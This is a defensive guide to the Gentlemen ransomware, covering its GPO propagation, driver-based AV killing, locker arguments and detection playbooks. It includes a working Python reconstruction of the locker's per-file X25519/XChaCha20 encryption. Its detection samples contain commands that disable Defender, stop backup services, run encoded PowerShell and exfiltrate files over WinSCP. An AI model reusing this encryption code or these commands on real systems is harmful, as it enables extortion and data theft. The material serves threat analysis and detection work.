Ransomware activity surged across 2025, with research noting a 126% year‑over‑year increase in the first quarter—a reminder that fast‑evolving crews can outpace traditional controls. Among the most active newcomers is Gentlemen ransomware, a double‑extortion operation first observed in August 2025 that quickly expanded across at least 17 countries and multiple sectors (manufacturing, healthcare, construction, insurance).
In this guide, you’ll learn what Gentlemen is, how it works, the TTPs it uses (GPO manipulation, BYOVD), crypto scheme and execution flow, detection ideas, and actionable steps mapped to MITRE ATT&CK and aligned to NIST/ISO practices—so your SOC and leadership can respond decisively.
What is Gentlemen Ransomware? (Definition & Context)
Gentlemen is an enterprise‑focused ransomware operation that steals data before encrypting it (double extortion), then threatens disclosure on a dark‑web leak site to coerce payment—even if victims have recoverable backups.
Key characteristics:
- Target profile: Medium‑to‑large organizations across global regions; notable activity in North and South America, APAC, Middle East.
- Operational maturity: Tailored toolchains, domain‑wide deployment via GPO, and legitimate driver abuse for defense evasion.
- Development language: The locker is written in Go, which makes cross‑platform builds (Windows today, with ESXi lockers reported) and rapid iteration of the toolchain straightforward.
Why this matters: The group’s mix of Active Directory tradecraft and kernel‑level evasion (BYOVD) means standard endpoint agents and default AD configurations are often insufficient.
How Gentlemen Breaks In and Moves: TTPs & Attack Chain
Initial Access & Recon
- Valid accounts (compromised credentials) and exposed infrastructure (e.g., FortiGate) have been observed as access vectors.
- Internal recon with tools such as Advanced IP Scanner and batch/PowerShell enumeration to map domain admins and other privileged groups.
Defense Evasion: BYOVD & Kill‑AV Tooling
- Abuse of legitimate signed drivers (e.g., ThrottleBlood.sys) to terminate protected security processes at kernel level—a classic Bring Your Own Vulnerable Driver (BYOVD) technique.
- The broader 2025 landscape saw multiple BYOVD campaigns exploiting Microsoft‑signed drivers (e.g., Paragon’s BioNTdrv.sys CVE‑2025‑0289), underscoring why driver allowlists/blocklists are now a must‑have.
Domain‑Wide Propagation: GPO Abuse
- Group Policy Objects (GPOs) are modified to deploy payloads, scheduled tasks, and policy changes across the domain, enabling rapid lateral movement and mass encryption.
- MITRE ATT&CK maps this behavior to T1484.001 – Domain Policy Modification: Group Policy Modification.
Persistence & Exfiltration
- AnyDesk for remote access and registry modifications for persistence; WinSCP over encrypted channels used for data exfiltration pre‑encryption.
Expert takeaway: Harden AD, lock down GPO permissions, and enforce driver blocklists. These two control planes (AD policy + kernel drivers) are where Gentlemen wins early.
Execution & Encryption: How the Locker Operates
Command‑Line Controlled Execution
Gentlemen enforces strict argument parsing at start. If a required --password is missing or invalid, the process terminates immediately, thwarting sandbox analysis and accidental runs. Operators can toggle scope and stealth with arguments like --silent, --full, --system, --shares, --fast, and --ultrafast.
Before encryption, the malware disables Microsoft Defender and stops backup/database services (e.g., Veeam, MSSQL, MongoDB) so that files those services hold open can be overwritten and recovery is slower.
Reality check: the Defender changes are made with the same PowerShell cmdlets and service‑control commands administrators use legitimately (Set-MpPreference, sc stop), so intent has to be inferred from context: which account ran them, on which host, and what followed within minutes.
Operator Arguments (Examples)
| Argument | Purpose | Notes |
|---|---|---|
| --password <value> | Mandatory run‑time credential; the locker exits if it is missing or invalid | Anti‑analysis gatekeeping |
| --silent | Suppress file renaming / reduce noise | Defense evasion |
| --full | Target local drives plus network shares | Maximizes impact |
| --system, --shares | Scope targeting to system paths or SMB shares | Operator control |
| --fast, --ultrafast | Partial encryption of large files (roughly 9% / 1% of content) | Speed vs. impact trade‑off |
Cryptography: X25519 + XChaCha20
Gentlemen uses a hybrid scheme: an X25519 key exchange against the attacker's public key derives a shared secret from which the file key is taken, and XChaCha20 encrypts the file content. Each file gets its own key, and the attacker's public key is decoded in memory rather than stored in the clear, so neither a dump of the binary nor a memory image of one file's encryption yields material that unlocks other files; recovery requires the operator's private key. Small files are encrypted in full; large files get selective segment encryption (roughly 9% of the content for --fast, roughly 1% for --ultrafast). Most bytes of a large file therefore remain plaintext, which matters for forensics (carving, content review) far more than for recovery: databases, virtual disks and archives are unusable once a fraction of their blocks is overwritten.
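To make the recovery argument concrete, the following is a stdlib‑only Python reconstruction of the scheme as this page describes it: a fresh X25519 key pair per file, the shared secret computed against an embedded attacker public key, a per‑file XChaCha20 key, and optional partial coverage for large files. It is an added illustration written for this guide, not Gentlemen's code. The key‑derivation step (SHA‑256 over the shared secret and file nonce), the 64 KiB small‑file threshold and the contiguous‑prefix segment layout are assumptions, since the page does not document the locker's exact KDF or segment selection; the Curve25519 ladder uses plain Python integers and is not constant‑time.

```python
import hashlib
import os
import struct

# ---- X25519 (RFC 7748). Plain-integer Montgomery ladder: NOT constant-time, illustration only.
P = 2**255 - 19
BASEPOINT = b"\x09" + b"\x00" * 31

def _clamp(scalar: bytes) -> int:
    b = bytearray(scalar)
    b[0] &= 248
    b[31] = (b[31] & 127) | 64
    return int.from_bytes(b, "little")

def x25519(scalar: bytes, point: bytes) -> bytes:
    k, x1 = _clamp(scalar), int.from_bytes(point, "little") & ((1 << 255) - 1)
    x2, z2, x3, z3, swap = 1, 0, x1, 1, 0
    for t in range(254, -1, -1):
        kt = (k >> t) & 1
        if swap ^ kt:
            x2, x3, z2, z3 = x3, x2, z3, z2
        swap = kt
        a, b = (x2 + z2) % P, (x2 - z2) % P
        aa, bb = a * a % P, b * b % P
        e, c, d = (aa - bb) % P, (x3 + z3) % P, (x3 - z3) % P
        da, cb = d * a % P, c * b % P
        x3, z3 = (da + cb) ** 2 % P, x1 * (da - cb) ** 2 % P
        x2, z2 = aa * bb % P, e * (aa + 121665 * e) % P
    if swap:
        x2, z2 = x3, z3
    return (x2 * pow(z2, P - 2, P) % P).to_bytes(32, "little")

# ---- ChaCha20 core (RFC 8439) plus HChaCha20/XChaCha20 (draft-irtf-cfrg-xchacha).
M32 = 0xFFFFFFFF
SIGMA = struct.unpack("<4L", b"expand 32-byte k")

def _qr(s, a, b, c, d):
    for shift, x, y, z in ((16, a, b, d), (12, c, d, b), (8, a, b, d), (7, c, d, b)):
        s[x] = (s[x] + s[y]) & M32
        v = s[z] ^ s[x]
        s[z] = ((v << shift) | (v >> (32 - shift))) & M32

def _rounds(state):
    s = list(state)
    for _ in range(10):  # 20 rounds = 10 x (column round + diagonal round)
        for idx in ((0, 4, 8, 12), (1, 5, 9, 13), (2, 6, 10, 14), (3, 7, 11, 15),
                    (0, 5, 10, 15), (1, 6, 11, 12), (2, 7, 8, 13), (3, 4, 9, 14)):
            _qr(s, *idx)
    return s

def chacha20_block(key: bytes, counter: int, nonce12: bytes) -> bytes:
    state = [*SIGMA, *struct.unpack("<8L", key), counter, *struct.unpack("<3L", nonce12)]
    return struct.pack("<16L", *((x + y) & M32 for x, y in zip(_rounds(state), state)))

def hchacha20(key: bytes, nonce16: bytes) -> bytes:
    s = _rounds([*SIGMA, *struct.unpack("<8L", key), *struct.unpack("<4L", nonce16)])
    return struct.pack("<8L", *s[:4], *s[12:])  # words 0-3 and 12-15, no feed-forward add

def xchacha20_xor(key: bytes, nonce24: bytes, data: bytes) -> bytes:
    subkey, nonce12 = hchacha20(key, nonce24[:16]), b"\x00" * 4 + nonce24[16:]
    out = bytearray()
    for off in range(0, len(data), 64):
        ks = chacha20_block(subkey, off // 64, nonce12)
        out += bytes(x ^ y for x, y in zip(data[off:off + 64], ks))
    return bytes(out)

# ---- Hybrid per-file scheme as the page describes it (reconstruction; KDF and layout ASSUMED).
SMALL_FILE_LIMIT = 64 * 1024  # ASSUMPTION: files up to this size are encrypted in full

def keypair(priv: bytes = b""):
    priv = priv or os.urandom(32)
    return priv, x25519(priv, BASEPOINT)

def coverage(size: int, mode: str = "normal") -> int:
    """Bytes to encrypt: ~9% for --fast, ~1% for --ultrafast, otherwise everything (prefix layout ASSUMED)."""
    pct = {"fast": 9, "ultrafast": 1}.get(mode, 100)
    return size if size <= SMALL_FILE_LIMIT else size * pct // 100

def encrypt_file(plaintext: bytes, attacker_pub: bytes, mode: str = "normal") -> bytes:
    eph_priv, eph_pub = keypair()  # fresh per file; eph_priv is discarded after use
    nonce = os.urandom(24)
    file_key = hashlib.sha256(x25519(eph_priv, attacker_pub) + nonce).digest()  # ASSUMED KDF
    n = coverage(len(plaintext), mode)
    # Header carries only public material, so the operator's private key is the sole way back.
    return eph_pub + nonce + struct.pack("<Q", n) + xchacha20_xor(file_key, nonce, plaintext[:n]) + plaintext[n:]

def decrypt_file(blob: bytes, attacker_priv: bytes) -> bytes:
    eph_pub, nonce, (n,) = blob[:32], blob[32:56], struct.unpack("<Q", blob[56:64])
    file_key = hashlib.sha256(x25519(attacker_priv, eph_pub) + nonce).digest()
    return xchacha20_xor(file_key, nonce, blob[64:64 + n]) + blob[64 + n:]

if __name__ == "__main__":
    att_priv, att_pub = keypair()  # operator key pair; the victim only ever sees att_pub
    data = bytes(range(256)) * 800
    blob = encrypt_file(data, att_pub, mode="fast")
    print(len(blob), coverage(len(data), "fast"), decrypt_file(blob, att_priv) == data)
```

The point to take from the code: every ciphertext header contains an ephemeral public key and a nonce, nothing else. Without the operator's X25519 private key there is no path from that header to the per‑file key, and the partial modes only change how many bytes of each large file are fed to the stream cipher, not the key‑management picture.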
Ransom Artifact
A note README-GENTLEMEN.txt is dropped in affected directories; some victims report desktop wallpaper changes and a TOX contact in the note.
Real‑World Observations & Case Notes
- Trend Micro documented domain‑wide compromise via GPO, driver abuse, custom Kill‑AV utilities (e.g., All.exe, Allpatch2.exe), and encrypted exfiltration via WinSCP with AnyDesk persistence.
- Reports consolidate 17+ countries affected and industry spread (manufacturing, healthcare, construction, insurance).
- Threat profiles from Broadcom (Symantec) and Blackpoint Cyber reference dropped notes, file extensions, and enterprise behaviors consistent with double extortion and service termination.
- Third‑party Threat Intel pieces highlight leak‑site activity and ongoing RaaS‑like evolution with XChaCha20 and ESXi lockers—a sign the operation is iterating rapidly.
Bottom line: Gentlemen combines AD tradecraft, kernel‑level evasion, and optimized crypto—a triad that compresses dwell time and increases blast radius.
Common Mistakes & Misconceptions
- “EDR is enough.” Not when GPOs can push scheduled tasks domain‑wide and BYOVD loads kernel drivers that kill EDR processes. Driver blocklists and GPO write‑permission hygiene are non‑negotiable.
- “Backups alone mitigate double extortion.” Backups won’t solve data‑leak pressure or regulatory exposure. You need DLP, segmented exfil monitoring, and legal/comms playbooks.
- “AD changes are noisy; we’ll notice.” Attackers often encode PowerShell, use legitimate consoles (GPMC), and alter registry/policies quietly. Continuous GPO change monitoring is essential.
- “Tamper Protection stops all Defender modification.” Tamper Protection blocks the Set-MpPreference and service‑stop route, but a vulnerable driver lets an attacker terminate the agent from kernel mode. Combine device control, kernel driver policies, and allow‑listing to raise the floor.
Best Practices & Actionable Steps (SOC Playbook)
1) Harden Active Directory & GPO
- Restrict GPO write/modify to least‑privileged admins; monitor T1484.001‑aligned changes (new scheduled tasks, script deployments, policy links).
- Audit SYSVOL for unauthorized scripts and NETLOGON shares for droppers.
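As an added example for the SYSVOL audit (written for this guide, not taken from Trend Micro or any other report), the following stdlib Python walks a SYSVOL tree or an offline copy, parses every Group Policy Preferences ScheduledTasks.xml, and flags tasks that fit the propagation pattern above: immediate tasks running as SYSTEM whose action launches a binary from a network share, passes an encoded PowerShell command, or carries the locker's --password argument. The sample XML, the policy GUID path, the host names and the three‑indicator threshold are all constructed assumptions for the demo.

```python
import os
import re
import tempfile
import xml.etree.ElementTree as ET

ENCODED_PS = re.compile(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\b")
REMOTE_LAUNCH = re.compile(r"(?i)^(\\\\[^\\]+\\|.*\\sysvol\\)")  # UNC path or anything under SYSVOL

def audit_tasks_xml(xml_text: str, source: str = "<memory>") -> list:
    """One finding per task in a GPP ScheduledTasks.xml that matches the domain-wide push pattern."""
    findings = []
    for task in ET.fromstring(xml_text):  # Task, TaskV2, ImmediateTask, ImmediateTaskV2 elements
        props = task.find("Properties")
        if props is None:
            continue
        exec_el = props.find(".//Actions/Exec")
        cmd = exec_el.findtext("Command", "") if exec_el is not None else ""
        args = exec_el.findtext("Arguments", "") if exec_el is not None else ""
        reasons = []
        if task.tag.startswith("Immediate"):
            reasons.append("immediate task: runs at next policy refresh on every targeted host")
        if "SYSTEM" in (props.get("runAs") or "").upper():
            reasons.append("runs as SYSTEM")
        if REMOTE_LAUNCH.match(cmd):
            reasons.append("command launched from a network share / SYSVOL")
        if ENCODED_PS.search(args) or ENCODED_PS.search(cmd):
            reasons.append("encoded PowerShell")
        if "--password" in args:
            reasons.append("locker-style --password argument")
        # ASSUMED threshold: SYSTEM immediate tasks are common admin practice, so require 3+ indicators.
        if len(reasons) >= 3:
            findings.append({"source": source, "name": task.get("name"), "changed": task.get("changed"),
                             "command": cmd, "arguments": args, "reasons": reasons})
    return findings

def audit_sysvol(root_dir: str) -> list:
    """Walk a live SYSVOL or an offline copy and audit every ScheduledTasks.xml found."""
    findings = []
    for dirpath, _, files in os.walk(root_dir):
        for name in files:
            if name.lower() == "scheduledtasks.xml":
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8-sig") as fh:
                    findings.extend(audit_tasks_xml(fh.read(), path))
    return findings

# Constructed sample (not a real victim artifact): one malicious immediate task, one routine task.
SAMPLE_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
  <ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="WinUpdateCheck"
      changed="2025-09-02 03:14:07" uid="{11111111-2222-3333-4444-555555555555}">
    <Properties action="C" name="WinUpdateCheck" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3">
        <Actions Context="Author">
          <Exec>
            <Command>\\dc01.corp.example\SYSVOL\corp.example\scripts\svchost.exe</Command>
            <Arguments>--password hunter2 --full --fast</Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
  <TaskV2 clsid="{D8896631-B747-47a7-84A6-C155337F3BC8}" name="InventoryScan"
      changed="2025-01-10 09:00:00" uid="{66666666-7777-8888-9999-000000000000}">
    <Properties action="U" name="InventoryScan" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3">
        <Actions Context="Author">
          <Exec>
            <Command>C:\Program Files\Inventory\scan.exe</Command>
            <Arguments>/quiet</Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </TaskV2>
</ScheduledTasks>
"""

def demo() -> list:
    """Write the constructed sample into a throw-away SYSVOL layout and audit it."""
    base = tempfile.mkdtemp(prefix="sysvol-demo-")
    pol = os.path.join(base, "corp.example", "Policies", "{31B2F340-016D-11D2-945F-00C04FB984F9}",
                       "Machine", "Preferences", "ScheduledTasks")
    os.makedirs(pol)
    with open(os.path.join(pol, "ScheduledTasks.xml"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_XML)
    return audit_sysvol(base)

if __name__ == "__main__":
    for hit in demo():
        print(hit["name"], hit["changed"], hit["command"], hit["reasons"])
```

Run it against `\\<domain>\SYSVOL\<domain>\Policies` (or a copy pulled during an incident) and baseline first: legitimate deployments will produce some SYSTEM immediate tasks, so compare each hit's `changed` timestamp with your change records and treat any task whose command points into SYSVOL\scripts or a workstation share as a priority.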
2) Stop BYOVD at the Door
- Enable Microsoft’s Vulnerable Driver Blocklist across endpoints (on by default on Windows 11 22H2 and later and wherever HVCI is on; it can also be deployed as a WDAC policy on older builds); use device control to block unsigned/unknown drivers. 2025 BYOVD campaigns exploited Microsoft‑signed Paragon drivers, so block known‑bad hashes, not just names.
- Monitor driver load events (e.g., Sysmon Event ID 6, with extra weight on drivers loading from user‑writable paths such as %TEMP%) and unexpected service installs (System log Event ID 7045; sc.exe/schtasks.exe usage).
3) Kill the Kill‑AV
- Detect attempts to stop Defender, alter MpPreference, or terminate AV/EDR services (e.g., Set-MpPreference with -Disable* switches, sc stop WinDefend, or suspicious TrustedInstaller‑level actions).
4) Detections & Threat Hunting (Mapped to ATT&CK)
- GPO modification: alert on new or changed ScheduledTasks.xml and GptTmpl.inf files under SYSVOL\Policies, and on Security Event ID 5136 (directory service object modified, requires the Directory Service Changes audit subcategory) against groupPolicyContainer objects; watch for Base64 PowerShell executed by the same account shortly after a GPO edit. (ATT&CK T1484.001).
- Service/Process termination: sequences targeting backup (Veeam), DB services (MSSQL/MongoDB) prior to encryption.
- Exfil channels: WinSCP executions with outbound SFTP to unknown hosts.
- Argumented locker runs: process creations whose command line carries --password together with --full, --fast or --ultrafast.
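The hunts above, expressed as rules over process, driver‑load and file events, as an added example written for this guide (not vendor content or a Sigma rule export). The events are constructed Sysmon‑style records, the regexes are ours, the allow‑list of corporate SFTP hosts is a placeholder, and the 10‑minute correlation window between a SYSVOL policy write and an encoded PowerShell launch by the same account is an assumption. ThrottleBlood.sys is the driver name from this page; its path in %TEMP% is invented for the sample.

```python
import re

# Constructed Sysmon-style events for the demo (not real telemetry). ts = epoch seconds.
# EventID 1 = process creation, 6 = driver loaded, 11 = file created.
EVENTS = [
    {"ts": 80, "EventID": 1, "Host": "FS01", "User": r"CORP\svc_backup",
     "CommandLine": r'WinSCP.exe /command "open sftp://upload@203.0.113.10/" "put D:\Finance\*.xlsx /drop/"'},
    {"ts": 100, "EventID": 1, "Host": "DC01", "User": r"CORP\svc_backup",
     "CommandLine": "powershell.exe -nop -w hidden Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"ts": 130, "EventID": 1, "Host": "DC01", "User": r"CORP\svc_backup", "CommandLine": "sc stop WinDefend"},
    {"ts": 160, "EventID": 1, "Host": "BKP01", "User": r"CORP\svc_backup", "CommandLine": "net stop VeeamBackupSvc /y"},
    {"ts": 190, "EventID": 6, "Host": "WS042", "User": "SYSTEM", "ImageLoaded": r"C:\Windows\Temp\ThrottleBlood.sys"},
    {"ts": 220, "EventID": 11, "Host": "DC01", "User": r"CORP\svc_backup",
     "TargetFilename": r"C:\Windows\SYSVOL\domain\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}"
                       r"\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml"},
    {"ts": 250, "EventID": 1, "Host": "DC01", "User": r"CORP\svc_backup",
     "CommandLine": "powershell.exe -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"ts": 400, "EventID": 1, "Host": "WS042", "User": "SYSTEM",
     "CommandLine": "svchost.exe --password hunter2 --full --ultrafast --silent"},
    # Benign noise that must not fire:
    {"ts": 500, "EventID": 1, "Host": "WS007", "User": r"CORP\jdoe", "CommandLine": "svchost.exe -k netsvcs -p"},
    {"ts": 520, "EventID": 1, "Host": "WS007", "User": r"CORP\itadmin",
     "CommandLine": "powershell.exe Set-MpPreference -ScanScheduleQuickScanTime 02:00"},
    {"ts": 540, "EventID": 6, "Host": "WS007", "User": "SYSTEM", "ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys"},
]

# (rule name, ATT&CK technique, Sysmon EventID, field to inspect, pattern)
RULES = [
    ("defender_tamper", "T1562.001", 1, "CommandLine",
     r"(?i)(Set-MpPreference\b.*-Disable\w+\s+\$?true|\b(sc|net)(\.exe)?\s+stop\s+(WinDefend|Sense)\b)"),
    ("backup_db_service_stop", "T1489", 1, "CommandLine",
     r'(?i)\b((sc|net)(\.exe)?\s+stop|Stop-Service(\s+-Name)?)\s+"?(Veeam|MSSQL|SQLSERVER|MongoDB)'),
    ("locker_arguments", "T1486", 1, "CommandLine",
     r"--password\s+\S+.*--(full|fast|ultrafast|silent|shares|system)\b"),
    ("encoded_powershell", "T1059.001", 1, "CommandLine",
     r"(?i)powershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\s"),
    ("gpo_preference_write", "T1484.001", 11, "TargetFilename",
     r"(?i)\\SYSVOL\\.*\\Policies\\\{[0-9A-F-]{36}\}\\.*\\(ScheduledTasks\.xml|GptTmpl\.inf)$"),
    ("driver_from_writable_path", "T1562.001", 6, "ImageLoaded",
     r"(?i)^C:\\(Windows\\Temp|Users\\[^\\]+\\AppData|ProgramData)\\.*\.sys$"),
    ("winscp_sftp_unknown_host", "T1048", 1, "CommandLine",
     r'(?i)winscp.*sftp://[^\s"/@]+@(?P<host>[0-9A-Z.\-]+)'),
]
RULES = [(name, tech, eid, field, re.compile(rx)) for name, tech, eid, field, rx in RULES]

def run_rules(events, allowed_sftp_hosts=frozenset()):
    """Apply every rule to every event; return hits sorted by time."""
    hits = []
    for ev in events:
        for name, tech, eid, field, rx in RULES:
            if ev.get("EventID") != eid:
                continue
            m = rx.search(ev.get(field, ""))
            if not m:
                continue
            if name == "winscp_sftp_unknown_host" and m.group("host").lower() in allowed_sftp_hosts:
                continue  # known corporate SFTP endpoint (placeholder allow-list), not a finding
            hits.append({"ts": ev["ts"], "host": ev["Host"], "user": ev["User"],
                         "rule": name, "technique": tech, "detail": m.group(0)})
    return sorted(hits, key=lambda h: h["ts"])

def sequence(hits, first, second, window=600, key="user"):
    """Pair a `first` hit with a later `second` hit sharing `key` within `window` seconds."""
    pairs = []
    for a in (h for h in hits if h["rule"] == first):
        for b in (h for h in hits if h["rule"] == second and h[key] == a[key]):
            if 0 <= b["ts"] - a["ts"] <= window:
                pairs.append((a, b))
    return pairs

if __name__ == "__main__":
    found = run_rules(EVENTS, allowed_sftp_hosts=frozenset({"sftp.corp.example"}))
    for h in found:
        print(h["ts"], h["host"], h["user"], h["rule"], h["technique"], h["detail"][:60])
    for gpo, ps in sequence(found, "gpo_preference_write", "encoded_powershell"):
        print("GPO edit followed by encoded PowerShell:", gpo["user"], gpo["ts"], "->", ps["ts"])
```

Each rule on its own is noisy in a large estate (admins do stop Veeam, and WinSCP has legitimate users), so the value is in the `sequence` step and in pivoting on the account: in the sample, one service account touches Defender on a domain controller, writes a ScheduledTasks.xml into SYSVOL, and runs encoded PowerShell within two minutes, which is the GPO‑push sequence described above regardless of what the individual commands look like.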
5) Crypto & Key‑Management Readiness
- Assume per‑file keys with X25519/XChaCha20: victim‑side decryption without the operator's private key is infeasible, and partial encryption does not change that. Keep KMS/HSM administration and backup‑encryption keys on hosts that are not AD‑joined (or at least not subject to domain GPOs), so a GPO push cannot reach them.
6) Resilience & Response
- Isolate AD quickly; disable compromised accounts; block policy propagation where possible.
- Execute containment runbooks for backup servers and DB clusters likely targeted pre‑encryption.
- Prepare legal/compliance steps for breach notification due to exfil.
Tools, Frameworks & Standards
- MITRE ATT&CK: Track T1484.001 (Group Policy Modification), T1562.001 (Disable or Modify Tools, which covers the BYOVD kill‑AV step), T1489 (Service Stop), T1486 (Data Encrypted for Impact), T1021 (Remote Services), T1219 (Remote Access Software) and T1048 (Exfiltration Over Alternative Protocol) across detections.
- NIST CSF 2.0 / SP 800‑53: Emphasize PR.AA (Identity Management, Authentication and Access Control) for AD/GPO rights, DE.AE (Adverse Event Analysis) and DE.CM (Continuous Monitoring) for policy changes, and PR.PS (Platform Security) for driver/device controls. PR.AC and PR.PT are the CSF 1.1 names for the access‑control and protective‑technology categories; CSF 2.0 reorganized them.
- ISO/IEC 27001:2022 Annex A: A.8.32 (Change management), A.8.15 (Logging) and A.8.16 (Monitoring activities), plus the A.5.19–A.5.22 supplier controls for vetting the EDR/AV vendors whose signed drivers you trust.
- SOC rule content: Providers like SOC Prime publish Sigma rules for Gentlemen mapped to ATT&CK, easing SIEM deployment.
Gentlemen vs. Your Environment: Risk‑Impact Snapshot
- Likelihood: Elevated for orgs with flat AD, weak GPO governance, and uncontrolled driver installs.
- Impact: Operational disruption (services killed), data breach/regulatory risk (exfil + leak), rapid domain‑wide spread via GPO.
- Time to impact: Minutes to hours once GPO control is obtained; partial encryption modes accelerate blast radius.
Frequently Asked Questions (FAQs)
Q1. Is Gentlemen a RaaS (Ransomware‑as‑a‑Service)?
Evidence is mixed; some intel notes rapid evolution and leak‑site growth reminiscent of RaaS, including XChaCha20 lockers and ESXi capability, while other briefs caution the model isn’t conclusively RaaS.
Q2. What makes Gentlemen hard to analyze?
The mandatory --password flag: without the right value the binary exits before doing anything, so automated sandboxes that detonate the sample without the operator's argument see no malicious behaviour, and analysts have to recover the value or patch the check. The partial‑encryption modes are about speed, not anti‑analysis: they shrink the window defenders have to react once encryption starts.
Q3. Which services are typically terminated pre‑encryption?
Microsoft Defender, Veeam, MSSQL, MongoDB (among others) are commonly targeted to unlock files and impede recovery.
Q4. How does the crypto scheme affect recovery?
With X25519 key exchange and per‑file XChaCha20 keys, decryption without TA keys is not feasible; partial encryption for large files still destroys integrity.
Q5. What artifacts signal Gentlemen?
Look for README-GENTLEMEN.txt ransom notes, TOX contact IDs, driver loads tied to Kill‑AV, and GPO changes deploying scheduled tasks or scripts domain‑wide.
Q6. Which ATT&CK techniques should we prioritize?
Start with T1484.001 (GPO Modification), T1562 (Impair Defenses), T1219 (Remote Access Software), T1021 (Remote Services) in your hunt queries.
Conclusion & Next Steps
Gentlemen ransomware blends AD/GPO mastery, kernel‑level evasion, and optimized encryption to overwhelm unprepared enterprises. The fix isn’t a single product; it’s a programmatic hardening of AD/GPO, driver governance, battle‑tested detections, and practiced IR playbooks.
- Assess AD/GPO exposure and driver policies this week.
- Deploy ATT&CK‑mapped detections (Sigma rules), then tabletop double‑extortion scenarios with legal/PR.
- Want a Sigma bundle and GPO monitoring checklist customized for your stack? I can draft both for you.